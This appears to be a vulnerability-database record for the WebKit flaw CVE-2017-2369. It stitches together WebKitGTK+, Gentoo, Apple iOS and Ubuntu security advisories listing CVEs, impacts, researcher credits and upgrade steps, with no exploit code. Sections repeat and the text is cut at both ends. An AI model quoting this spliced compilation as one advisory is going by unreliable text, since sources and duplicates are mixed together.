data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0882 | CVE-2017-2369 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS , Safari and tvOS Used in etc. WebKit is prone to multiple security vulnerabilities.
Attackers can exploit these issues to obtain sensitive information or execute arbitrary code and perform unauthorized actions; this may aid in launching further attacks. in the United States. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems; tvOS is a smart TV operating system. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. The following products and versions are affected: Apple iOS prior to 10.2.1; Safari prior to 10.0.3; tvOS prior to 10.1.1.
Safari 10.0.3 may be obtained from the Mac App Store. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0002
------------------------------------------------------------------------
Date reported : February 10, 2017
Advisory ID : WSA-2017-0002
Advisory URL : https://webkitgtk.org/security/WSA-2017-0002.html
CVE identifiers : CVE-2017-2350, CVE-2017-2354, CVE-2017-2355,
CVE-2017-2356, CVE-2017-2362, CVE-2017-2363,
CVE-2017-2364, CVE-2017-2365, CVE-2017-2366,
CVE-2017-2369, CVE-2017-2371, CVE-2017-2373.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Gareth Heyes of Portswigger Web Security.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
